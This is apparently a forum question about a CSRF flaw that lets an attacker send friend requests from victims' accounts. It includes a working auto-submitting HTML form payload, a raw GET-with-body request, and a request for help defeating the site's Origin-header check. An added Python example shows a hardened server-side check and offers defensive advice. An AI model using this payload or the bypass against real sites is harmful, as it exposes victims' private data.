web application – CSRF: GET request with POST data?


I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a POST request. Using usual exploitation techniques, I crafted the following webpage.

<html>
    <head></head>
    <body>
        <span>csrf test</span>

        <form action="http://vulnerable.com/friendRequest.asp" method="POST">
            <input type="hidden" name="MessageArea" value="this is a test of csrf">
            <input type="hidden" name="FriendName" value="testuser">
        </form>

        <script>
            // document.forms is an HTMLCollection: index it, do not call it
            document.forms[0].submit();
        </script>

    </body>
</html>

Unfortunately though, the website checks for the Origin header in the request, so this payload doesn’t work. Switching to a GET request and deleting the Origin header actually sends the request successfully. The request looks like the following.

GET /friendRequest.asp HTTP/1.1
Host: www.vulnerable.com
User-Agent: Mozilla/5.0
... (no origin header)
Cookie: secret_cookie

MessageArea=this+is+a+test+for+csrf&FriendName=testuser

As you can see, this is a GET request with POST data sent at the bottom. Unfortunately, the request doesn’t go through with the parameters in the URL like in a true GET request. Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF? I have looked into XMLHttpRequest and fetch but I’m not sure that they are the right tools for the job.
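
Added example, not part of the original question and not the application's code: a server-side check that closes the gap described above, shown beside one assumed reading of the flawed logic (an Origin header is validated only when it is present). The allow-list, function names and sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumed values for illustration; the question names only the host.
ALLOWED_ORIGINS = {"http://vulnerable.com", "http://www.vulnerable.com"}
STATE_CHANGING_METHODS = {"POST"}


def origin_of(url):
    """Reduce a URL (e.g. a Referer) to scheme://host[:port]."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def weak_check(method, headers):
    """Assumed flawed logic: only a present, foreign Origin is rejected."""
    origin = headers.get("Origin")
    return origin is None or origin.lower() in ALLOWED_ORIGINS


def hardened_check(method, headers):
    """Allow the friend request only for POST from a verified same-site source."""
    if method.upper() not in STATE_CHANGING_METHODS:
        return False  # GET must never change state, with or without a body
    origin = headers.get("Origin")
    if origin is None:
        # Fall back to Referer; if both are absent, fail closed.
        referer = headers.get("Referer")
        origin = origin_of(referer) if referer else None
    return origin is not None and origin.lower() in ALLOWED_ORIGINS


# Constructed requests mirroring the two cases in the question.
CROSS_SITE_POST = ("POST", {"Origin": "http://attacker.example", "Cookie": "secret_cookie"})
GET_NO_ORIGIN = ("GET", {"Cookie": "secret_cookie"})
LEGIT_POST = ("POST", {"Origin": "http://www.vulnerable.com", "Cookie": "secret_cookie"})

if __name__ == "__main__":
    for name, (method, headers) in [("cross-site POST", CROSS_SITE_POST),
                                    ("GET without Origin", GET_NO_ORIGIN),
                                    ("legitimate POST", LEGIT_POST)]:
        print(f"{name:20} weak={weak_check(method, headers)} "
              f"hardened={hardened_check(method, headers)}")
```

Header checks like this are a second layer; a per-session anti-CSRF token validated on every state-changing request remains the primary control. Browsers do not emit the request shown in the question (fetch() rejects a body on GET and XMLHttpRequest drops it), but the endpoint should still refuse GET for this action.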